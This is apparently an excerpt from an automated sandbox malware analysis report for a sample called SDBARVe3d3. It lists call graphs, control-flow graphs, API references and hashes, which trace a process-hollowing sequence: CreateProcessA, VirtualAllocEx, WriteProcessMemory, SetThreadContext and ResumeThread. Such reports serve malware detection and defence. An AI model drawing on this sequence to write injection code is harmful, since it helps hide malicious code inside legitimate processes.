7295f12 2 API calls 21778->21795 21796 7295db2 4 API calls 21778->21796 21797 7295bb7 6 API calls 21778->21797 21779 729573a 21779->21730 21780->21779 21781->21779 21782->21779 21783->21779 21784->21779 21785->21779 21786->21779 21787->21779 21788->21779 21789->21779 21790->21779 21791->21779 21792->21779 21793->21779 21794->21779 21795->21779 21796->21779 21797->21779 21799 729570c 21798->21799 21801 7295781 21798->21801 21802 7295f6c 2 API calls 21799->21802 21803 7295c0c 4 API calls 21799->21803 21804 7295c81 6 API calls 21799->21804 21805 7295de0 2 API calls 21799->21805 21806 7295d65 4 API calls 21799->21806 21807 7295b06 6 API calls 21799->21807 21808 729605b 4 API calls 21799->21808 21809 7295eba 4 API calls 21799->21809 21810 729613a 4 API calls 21799->21810 21811 7295d5d 2 API calls 21799->21811 21812 7295d3e 2 API calls 21799->21812 21813 729621e 2 API calls 21799->21813 21814 7296391 2 API calls 21799->21814 21815 7295c51 4 API calls 21799->21815 21816 7295c30 2 API calls 21799->21816 21817 7295f12 2 API calls 21799->21817 21818 7295db2 4 API calls 21799->21818 21819 7295bb7 6 API calls 21799->21819 21800 729573a 21800->21730 21801->21730 21802->21800 21803->21800 21804->21800 21805->21800 21806->21800 21807->21800 21808->21800 21809->21800 21810->21800 21811->21800 21812->21800 21813->21800 21814->21800 21815->21800 21816->21800 21817->21800 21818->21800 21819->21800 21821 7295d55 21820->21821 21950 7294770 21821->21950 21954 7294778 21821->21954 21822 72963ba 21826 7295bed 21825->21826 21958 7294910 21825->21958 21962 7294907 21825->21962 21828 72960e1 21826->21828 21966 72944e8 21826->21966 21970 72944f0 21826->21970 21827 72963ba 21831 7294778 ReadProcessMemory 21828->21831 21832 7294770 ReadProcessMemory 21828->21832 21831->21827 21832->21827 21836 7295db6 21835->21836 21982 72945c3 21836->21982 21986 72945c8 21836->21986 21837 7295f29 21838 72960c8 21837->21838 21974 7294683 21837->21974 21978 7294688 21837->21978 21838->21737 21844 7295f18 21843->21844 21845 72960c8 21844->21845 21846 7294688 WriteProcessMemory 21844->21846 21847 7294683 WriteProcessMemory 21844->21847 21845->21737 21846->21844 21847->21844 21849 7295c39 21848->21849 21851 7294688 WriteProcessMemory 21849->21851 21852 7294683 WriteProcessMemory 21849->21852 21850 7296008 21851->21850 21852->21850 21855 7295c57 21853->21855 21854 72962cf 21854->21737 21855->21854 21858 72945c8 VirtualAllocEx 21855->21858 21859 72945c3 VirtualAllocEx 21855->21859 21856 7295f29 21857 72960c8 21856->21857 21860 7294688 WriteProcessMemory 21856->21860 21861 7294683 WriteProcessMemory 21856->21861 21857->21737 21858->21856 21859->21856 21860->21856 21861->21856 21863 7296397 21862->21863 21864 72963ba 21863->21864 21865 7294778 ReadProcessMemory 21863->21865 21866 7294770 ReadProcessMemory 21863->21866 21864->21864 21865->21864 21866->21864 21868 7295df7 21867->21868 21869 7295da3 21867->21869 21990 7294438 21868->21990 21994 7294440 21868->21994 21873 7295d44 21872->21873 21875 7294778 ReadProcessMemory 21873->21875 21876 7294770 ReadProcessMemory 21873->21876 21874 72963ba 21875->21874 21876->21874 21878 72960f8 21877->21878 21880 7294778 ReadProcessMemory 21878->21880 21881 7294770 ReadProcessMemory 21878->21881 21879 72963ba 21880->21879 21881->21879 21884 7295d7f 21882->21884 21883 72961a1 21883->21737 21884->21883 21887 72945c8 VirtualAllocEx 21884->21887 21888 72945c3 VirtualAllocEx 21884->21888 21885 7295f29 21886 72960c8 21885->21886 21889 7294688 WriteProcessMemory 21885->21889 21890 7294683 WriteProcessMemory 21885->21890 21886->21737 21887->21885 21888->21885 21889->21885 21890->21885 21892 7295c18 21891->21892 21892->21891 21894 72960e1 21892->21894 21895 72944e8 Wow64SetThreadContext 21892->21895 21896 72944f0 Wow64SetThreadContext 21892->21896 21893 72963ba 21893->21893 21897 7294778 ReadProcessMemory 21894->21897 21898 7294770 ReadProcessMemory 21894->21898 21895->21892 21896->21892 21897->21893 21898->21893 21900 7296317 21899->21900 21905 72944e8 Wow64SetThreadContext 21900->21905 21906 72944f0 Wow64SetThreadContext 21900->21906 21901 7295df8 21902 7295da3 21901->21902 21903 7294438 ResumeThread 21901->21903 21904 7294440 ResumeThread 21901->21904 21902->21737 21903->21902 21904->21902 21905->21901 21906->21901 21908 7295b25 21907->21908 21916 7294910 CreateProcessA 21908->21916 21917 7294907 CreateProcessA 21908->21917 21909 7295bed 21910 72960e1 21909->21910 21914 72944e8 Wow64SetThreadContext 21909->21914 21915 72944f0 Wow64SetThreadContext 21909->21915 21912 7294778 ReadProcessMemory 21910->21912 21913 7294770 ReadProcessMemory 21910->21913 21911 72963ba 21912->21911 21913->21911 21914->21909 21915->21909 21916->21909 21917->21909 21919 7295d6e 21918->21919 21922 72945c8 VirtualAllocEx 21919->21922 21923 72945c3 VirtualAllocEx 21919->21923 21920 7295f29 21921 72960c8 21920->21921 21924 7294688 WriteProcessMemory 21920->21924 21925 7294683 WriteProcessMemory 21920->21925 21921->21737 21922->21920 21923->21920 21924->21920 21925->21920 21927 7295de6 21926->21927 21929 7294438 ResumeThread 21927->21929 21930 7294440 ResumeThread 21927->21930 21928 7295da3 21929->21928 21930->21928 21936 7294688 WriteProcessMemory 21931->21936 21937 7294683 WriteProcessMemory 21931->21937 21932 7295cf7 21933 7295c18 21933->21932 21935 72960e1 21933->21935 21938 72944e8 Wow64SetThreadContext 21933->21938 21939 72944f0 Wow64SetThreadContext 21933->21939 21934 72963ba 21934->21934 21940 7294778 ReadProcessMemory 21935->21940 21941 7294770 ReadProcessMemory 21935->21941 21936->21933 21937->21933 21938->21933 21939->21933 21940->21934 21941->21934 21943 7295c18 21942->21943 21945 72960e1 21943->21945 21946 72944e8 Wow64SetThreadContext 21943->21946 21947 72944f0 Wow64SetThreadContext 21943->21947 21944 72963ba 21948 7294778 ReadProcessMemory 21945->21948 21949 7294770 ReadProcessMemory 21945->21949 21946->21943 21947->21943 21948->21944 21949->21944 21951 7294778 ReadProcessMemory 21950->21951 21953 7294807 21951->21953 21953->21822 21955 72947c3 ReadProcessMemory 21954->21955 21957 7294807 21955->21957 21957->21822 21959 7294999 CreateProcessA 21958->21959 21961 7294b5b 21959->21961 21963 7294999 CreateProcessA 21962->21963 21965 7294b5b 21963->21965 21967 72944f0 Wow64SetThreadContext 21966->21967 21969 729457d 21967->21969 21969->21826 21971 7294535 Wow64SetThreadContext 21970->21971 21973 729457d 21971->21973 21973->21826 21975 7294688 WriteProcessMemory 21974->21975 21977 7294727 21975->21977 21977->21837 21979 72946d0 WriteProcessMemory 21978->21979 21981 7294727 21979->21981 21981->21837 21983 72945c8 VirtualAllocEx 21982->21983 21985 7294645 21983->21985 21985->21837 21987 7294608 VirtualAllocEx 21986->21987 21989 7294645 21987->21989 21989->21837 21991 729443d ResumeThread 21990->21991 21993 72944b1 21991->21993 21993->21869 21995 7294480 ResumeThread 21994->21995 21997 72944b1 21995->21997 21997->21869 21998 516d950 DuplicateHandle 21999 516d9e6 21998->21999 22000 72969e0 22001 7296b6b 22000->22001 22003 7296a06 22000->22003 22003->22001 22004 72928dc 22003->22004 22005 7296c60 PostMessageW 22004->22005 22006 7296ccc 22005->22006 22006->22003 22007 516d708 22008 516d74e GetCurrentProcess 22007->22008 22010 516d7a0 GetCurrentThread 22008->22010 22011 516d799 22008->22011 22012 516d7d6 22010->22012 22013 516d7dd GetCurrentProcess 22010->22013 22011->22010 22012->22013 22016 516d813 22013->22016 22014 516d83b GetCurrentThreadId 22015 516d86c 22014->22015 22016->22014 22017 5164668 22018 516467a 22017->22018 22019 5164686 22018->22019 22023 5164781 22018->22023 22029 5164210 22019->22029 22021 51646b1 22024 516478a 22023->22024 22026 51647e0 22023->22026 22033 5164890 22024->22033 22037 516487f 22024->22037 22026->22019 22030 516421b 22029->22030 22045 5165df4 22030->22045 22032 5167472 22032->22021 22035 51648b7 22033->22035 22034 5164994 22034->22034 22035->22034 22041 51644d4 22035->22041 22039 51648b7 22037->22039 22038 5164994 22038->22038 22039->22038 22040 51644d4 CreateActCtxA 22039->22040 22040->22038 22042 5165920 CreateActCtxA 22041->22042 22044 51659e3 22042->22044 22046 5165dff 22045->22046 22049 5165e14 22046->22049 22048 516753d 22048->22032 22050 5165e1f 22049->22050 22053 5165e44 22050->22053 22052 516761a 22052->22048 22054 5165e4f 22053->22054 22057 5165e74 22054->22057 22056 516770d 22056->22052 22058 5165e7f 22057->22058 22060 516888b 22058->22060 22063 516af3a 22058->22063 22059 51688c9 22059->22056 22060->22059 22067 516d028 22060->22067 22072 516af70 22063->22072 22075 516af60 22063->22075 22064 516af4e 22064->22060 22069 516d059 22067->22069 22068 516d07d 22068->22059 22069->22068 22084 516d1d8 22069->22084 22088 516d1e8 22069->22088 22079 516b058 22072->22079 22073 516af7f 22073->22064 22076 516af70 22075->22076 22078 516b058 GetModuleHandleW 22076->22078 22077 516af7f 22077->22064 22078->22077 22080 516b079 22079->22080 22081 516b09c 22079->22081 22080->22081 22082 516b2a0 GetModuleHandleW 22080->22082 22081->22073 22083 516b2cd 22082->22083 22083->22073 22085 516d1e8 22084->22085 22086 516d22f 22085->22086 22092 516bdc0 22085->22092 22086->22068 22090 516d1f5 22088->22090 22089 516d22f 22089->22068 22090->22089 22091 516bdc0 GetModuleHandleW 22090->22091 22091->22089 22093 516bdcb 22092->22093 22095 516df48 22093->22095 22096 516d3e4 22093->22096 22095->22095 22097 516d3ef 22096->22097 22098 5165e74 GetModuleHandleW 22097->22098 22099 516dfb7 22098->22099 22099->22095

                                                                                                                                    Executed Functions

                                                                                                                                    Function 072978F0 Relevance: .4, Instructions: 402COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f308d8bc0fbbf24b65176c042892c62eb6ee7f055c884ac57fdacba63a32f18a
                                                                                                                                    • Instruction ID: 79bde7c53416699d99207b55231de8775e4600f1cc4a5ab71a7689ab3964cd97
                                                                                                                                    • Opcode Fuzzy Hash: f308d8bc0fbbf24b65176c042892c62eb6ee7f055c884ac57fdacba63a32f18a
                                                                                                                                    • Instruction Fuzzy Hash: A0E1CAB17212068FDB29DB79C460BAEB7FAAF89700F28447DD1469B391DB34E901CB51
                                                                                                                                    Function 0516D6F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 294 516d6f8-516d797 GetCurrentProcess 298 516d7a0-516d7d4 GetCurrentThread 294->298 299 516d799-516d79f 294->299 300 516d7d6-516d7dc 298->300 301 516d7dd-516d811 GetCurrentProcess 298->301 299->298 300->301 303 516d813-516d819 301->303 304 516d81a-516d835 call 516d8d8 301->304 303->304 307 516d83b-516d86a GetCurrentThreadId 304->307 308 516d873-516d8d5 307->308 309 516d86c-516d872 307->309 309->308
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0516D786
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0516D7C3
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0516D800
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0516D859
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 2063062207-2367252532
                                                                                                                                    • Opcode ID: bd47467689e92f60841b4e08c66dd0b859d6053933934fff016e8fb16c6da682
                                                                                                                                    • Instruction ID: c4b136808a7ab933b2ac65e452a1e0f12af417bdf0eea5bc8ab31141fef7642a
                                                                                                                                    • Opcode Fuzzy Hash: bd47467689e92f60841b4e08c66dd0b859d6053933934fff016e8fb16c6da682
                                                                                                                                    • Instruction Fuzzy Hash: 315146B0A103099FDB04DFA9D548B9EBBF1FB48304F248469E059B73A1DB789984CF65
                                                                                                                                    Function 0516D708 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 316 516d708-516d797 GetCurrentProcess 320 516d7a0-516d7d4 GetCurrentThread 316->320 321 516d799-516d79f 316->321 322 516d7d6-516d7dc 320->322 323 516d7dd-516d811 GetCurrentProcess 320->323 321->320 322->323 325 516d813-516d819 323->325 326 516d81a-516d835 call 516d8d8 323->326 325->326 329 516d83b-516d86a GetCurrentThreadId 326->329 330 516d873-516d8d5 329->330 331 516d86c-516d872 329->331 331->330
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0516D786
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0516D7C3
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0516D800
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0516D859
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 2063062207-2367252532
                                                                                                                                    • Opcode ID: 65f1559ff98d4bd89dc6112e05d8b5a1265ddecdb917cfb73f548d2e18e8adc4
                                                                                                                                    • Instruction ID: be290d539aec7849c1e6901834ca9d0e9711ead84c7b190b39750cf7ecce9f21
                                                                                                                                    • Opcode Fuzzy Hash: 65f1559ff98d4bd89dc6112e05d8b5a1265ddecdb917cfb73f548d2e18e8adc4
                                                                                                                                    • Instruction Fuzzy Hash: A05158B09002099FDB14DFA9D548B9EBBF1FF48304F208459E019B73A0DB749984CF65
                                                                                                                                    Function 07294907 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 338 7294907-72949a5 340 72949de-72949fe 338->340 341 72949a7-72949b1 338->341 348 7294a00-7294a0a 340->348 349 7294a37-7294a66 340->349 341->340 342 72949b3-72949b5 341->342 344 72949d8-72949db 342->344 345 72949b7-72949c1 342->345 344->340 346 72949c3 345->346 347 72949c5-72949d4 345->347 346->347 347->347 350 72949d6 347->350 348->349 351 7294a0c-7294a0e 348->351 355 7294a68-7294a72 349->355 356 7294a9f-7294b59 CreateProcessA 349->356 350->344 353 7294a31-7294a34 351->353 354 7294a10-7294a1a 351->354 353->349 357 7294a1c 354->357 358 7294a1e-7294a2d 354->358 355->356 359 7294a74-7294a76 355->359 369 7294b5b-7294b61 356->369 370 7294b62-7294be8 356->370 357->358 358->358 360 7294a2f 358->360 361 7294a99-7294a9c 359->361 362 7294a78-7294a82 359->362 360->353 361->356 364 7294a84 362->364 365 7294a86-7294a95 362->365 364->365 365->365 366 7294a97 365->366 366->361 369->370 380 7294bf8-7294bfc 370->380 381 7294bea-7294bee 370->381 383 7294c0c-7294c10 380->383 384 7294bfe-7294c02 380->384 381->380 382 7294bf0 381->382 382->380 386 7294c20-7294c24 383->386 387 7294c12-7294c16 383->387 384->383 385 7294c04 384->385 385->383 388 7294c36-7294c3d 386->388 389 7294c26-7294c2c 386->389 387->386 390 7294c18 387->390 391 7294c3f-7294c4e 388->391 392 7294c54 388->392 389->388 390->386 391->392 394 7294c55 392->394 394->394
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07294B46
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID: <mQW$<mQW
                                                                                                                                    • API String ID: 963392458-1775728290
                                                                                                                                    • Opcode ID: 13ffc2a73411fc409920186d373bfb152088362164ef0e821158e6e7ef5e44e8
                                                                                                                                    • Instruction ID: 6cf36561dd539b976871d887986fe676117ec8b3496270966c73812987602975
                                                                                                                                    • Opcode Fuzzy Hash: 13ffc2a73411fc409920186d373bfb152088362164ef0e821158e6e7ef5e44e8
                                                                                                                                    • Instruction Fuzzy Hash: E5A16EB1D1025ADFDF14DFA8C8507DEBBB2BF44314F1885A9E808A7240DB749986CF91
                                                                                                                                    Function 07294910 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 395 7294910-72949a5 397 72949de-72949fe 395->397 398 72949a7-72949b1 395->398 405 7294a00-7294a0a 397->405 406 7294a37-7294a66 397->406 398->397 399 72949b3-72949b5 398->399 401 72949d8-72949db 399->401 402 72949b7-72949c1 399->402 401->397 403 72949c3 402->403 404 72949c5-72949d4 402->404 403->404 404->404 407 72949d6 404->407 405->406 408 7294a0c-7294a0e 405->408 412 7294a68-7294a72 406->412 413 7294a9f-7294b59 CreateProcessA 406->413 407->401 410 7294a31-7294a34 408->410 411 7294a10-7294a1a 408->411 410->406 414 7294a1c 411->414 415 7294a1e-7294a2d 411->415 412->413 416 7294a74-7294a76 412->416 426 7294b5b-7294b61 413->426 427 7294b62-7294be8 413->427 414->415 415->415 417 7294a2f 415->417 418 7294a99-7294a9c 416->418 419 7294a78-7294a82 416->419 417->410 418->413 421 7294a84 419->421 422 7294a86-7294a95 419->422 421->422 422->422 423 7294a97 422->423 423->418 426->427 437 7294bf8-7294bfc 427->437 438 7294bea-7294bee 427->438 440 7294c0c-7294c10 437->440 441 7294bfe-7294c02 437->441 438->437 439 7294bf0 438->439 439->437 443 7294c20-7294c24 440->443 444 7294c12-7294c16 440->444 441->440 442 7294c04 441->442 442->440 445 7294c36-7294c3d 443->445 446 7294c26-7294c2c 443->446 444->443 447 7294c18 444->447 448 7294c3f-7294c4e 445->448 449 7294c54 445->449 446->445 447->443 448->449 451 7294c55 449->451 451->451
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07294B46
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID: <mQW$<mQW
                                                                                                                                    • API String ID: 963392458-1775728290
                                                                                                                                    • Opcode ID: 14361d96168194e8e37f1511ab848c71866058139e48719a065ad38ae9aa690e
                                                                                                                                    • Instruction ID: 0ce928b6aa729676ea6167cd46523268d12abfbb3d033736c5407536a02b9754
                                                                                                                                    • Opcode Fuzzy Hash: 14361d96168194e8e37f1511ab848c71866058139e48719a065ad38ae9aa690e
                                                                                                                                    • Instruction Fuzzy Hash: D4916EB1D1025ADFDF14DFA8C850BDEBBB6BF44314F1885A9E808A7240DB749986CF91
                                                                                                                                    Function 0516B058 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 202COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 569 516b058-516b077 570 516b0a3-516b0a7 569->570 571 516b079-516b086 call 51699e0 569->571 573 516b0bb-516b0fc 570->573 574 516b0a9-516b0b3 570->574 577 516b09c 571->577 578 516b088 571->578 580 516b0fe-516b106 573->580 581 516b109-516b117 573->581 574->573 577->570 625 516b08e call 516b300 578->625 626 516b08e call 516b2f0 578->626 580->581 582 516b13b-516b13d 581->582 583 516b119-516b11e 581->583 588 516b140-516b147 582->588 585 516b120-516b127 call 516a3b0 583->585 586 516b129 583->586 584 516b094-516b096 584->577 587 516b1d8-516b298 584->587 590 516b12b-516b139 585->590 586->590 620 516b2a0-516b2cb GetModuleHandleW 587->620 621 516b29a-516b29d 587->621 591 516b154-516b15b 588->591 592 516b149-516b151 588->592 590->588 595 516b15d-516b165 591->595 596 516b168-516b171 call 516a3c0 591->596 592->591 595->596 600 516b173-516b17b 596->600 601 516b17e-516b183 596->601 600->601 602 516b185-516b18c 601->602 603 516b1a1-516b1a5 601->603 602->603 605 516b18e-516b19e call 516a3d0 call 516a3e0 602->605 608 516b1ab-516b1ae 603->608 605->603 610 516b1b0-516b1ce 608->610 611 516b1d1-516b1d7 608->611 610->611 622 516b2d4-516b2e8 620->622 623 516b2cd-516b2d3 620->623 621->620 623->622 625->584 626->584
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0516B2BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleModule
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 4139908857-2367252532
                                                                                                                                    • Opcode ID: dc4bdaeb09b9041133228eac0a4bd7e49a49f6921f92fa6cea8fa2e51a04b3d8
                                                                                                                                    • Instruction ID: a12e8acccf83e61535300efeaae185f2fb402484be9404fa466c5a601ff5cf85
                                                                                                                                    • Opcode Fuzzy Hash: dc4bdaeb09b9041133228eac0a4bd7e49a49f6921f92fa6cea8fa2e51a04b3d8
                                                                                                                                    • Instruction Fuzzy Hash: 63814570A04B059FD724DF2AD445B6ABBF2FF88300F00892DD48AD7A50EB75E959CB90
                                                                                                                                    Function 05165915 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 627 5165915-51659e1 CreateActCtxA 629 51659e3-51659e9 627->629 630 51659ea-5165a44 627->630 629->630 637 5165a46-5165a49 630->637 638 5165a53-5165a57 630->638 637->638 639 5165a68 638->639 640 5165a59-5165a65 638->640 642 5165a69 639->642 640->639 642->642
                                                                                                                                    APIs
                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 051659D1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Create
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 2289755597-2367252532
                                                                                                                                    • Opcode ID: 15b4fbc47b47e72dbd1c56473d9ad754485943df36ccfe8b73b0acf54e9ac803
                                                                                                                                    • Instruction ID: 86ecf4e19a465ac28c9c742bb13a51a9364d234da3946f00d1d46d7bbef73d7a
                                                                                                                                    • Opcode Fuzzy Hash: 15b4fbc47b47e72dbd1c56473d9ad754485943df36ccfe8b73b0acf54e9ac803
                                                                                                                                    • Instruction Fuzzy Hash: 9A41F0B0C00619DFDB24CFA9C984BCDBBF6BF49304F64806AD408AB255DB755949CF90
                                                                                                                                    Function 051644D4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 643 51644d4-51659e1 CreateActCtxA 646 51659e3-51659e9 643->646 647 51659ea-5165a44 643->647 646->647 654 5165a46-5165a49 647->654 655 5165a53-5165a57 647->655 654->655 656 5165a68 655->656 657 5165a59-5165a65 655->657 659 5165a69 656->659 657->656 659->659
                                                                                                                                    APIs
                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 051659D1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Create
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 2289755597-2367252532
                                                                                                                                    • Opcode ID: 194ef2886d2bab15b4d62011fa098a6b620e9a1220f8e244c63d9b6f02876316
                                                                                                                                    • Instruction ID: 1bf8f7e6e242cc9c460a00a8b9d441ad6e98ad6aec7dc46d49b1d606e14c857a
                                                                                                                                    • Opcode Fuzzy Hash: 194ef2886d2bab15b4d62011fa098a6b620e9a1220f8e244c63d9b6f02876316
                                                                                                                                    • Instruction Fuzzy Hash: 604102B0C0061DDFDB24DFA9C884B8EBBF6BF49304F60806AD408AB251DB756945CF90
                                                                                                                                    Function 07294683 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73injectionCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 660 7294683-72946d6 663 72946d8-72946e4 660->663 664 72946e6-7294725 WriteProcessMemory 660->664 663->664 666 729472e-729475e 664->666 667 7294727-729472d 664->667 667->666
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07294718
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 3559483778-2367252532
                                                                                                                                    • Opcode ID: 86e00fd9f9f526c98177cf9deb1ca975d0a568cad9e782a2aaf778cdbd67e1fa
                                                                                                                                    • Instruction ID: cbf90d361c090158789b4e26f9558999e437543b28f98891871565b370a586bb
                                                                                                                                    • Opcode Fuzzy Hash: 86e00fd9f9f526c98177cf9deb1ca975d0a568cad9e782a2aaf778cdbd67e1fa
                                                                                                                                    • Instruction Fuzzy Hash: CB2157B59003599FCF10DFAAC881BDEBBF5FF48310F14842AE958A7240C7789955CBA4
                                                                                                                                    Function 07294688 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 671 7294688-72946d6 673 72946d8-72946e4 671->673 674 72946e6-7294725 WriteProcessMemory 671->674 673->674 676 729472e-729475e 674->676 677 7294727-729472d 674->677 677->676
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07294718
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 3559483778-2367252532
                                                                                                                                    • Opcode ID: 4869c6d0ca4cca9a5d166807f56db0a7f6bf73df5eb07ed8cf2898821fe73ea9
                                                                                                                                    • Instruction ID: 58a06790b485d4f217789f0b6c55de1477223a51c93dfbb0e8a711c448019ef0
                                                                                                                                    • Opcode Fuzzy Hash: 4869c6d0ca4cca9a5d166807f56db0a7f6bf73df5eb07ed8cf2898821fe73ea9
                                                                                                                                    • Instruction Fuzzy Hash: 7E2166B59003599FCF10DFAAC880BDEBBF5FF48310F10882AE958A7240C7789955CBA4
                                                                                                                                    Function 07294770 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
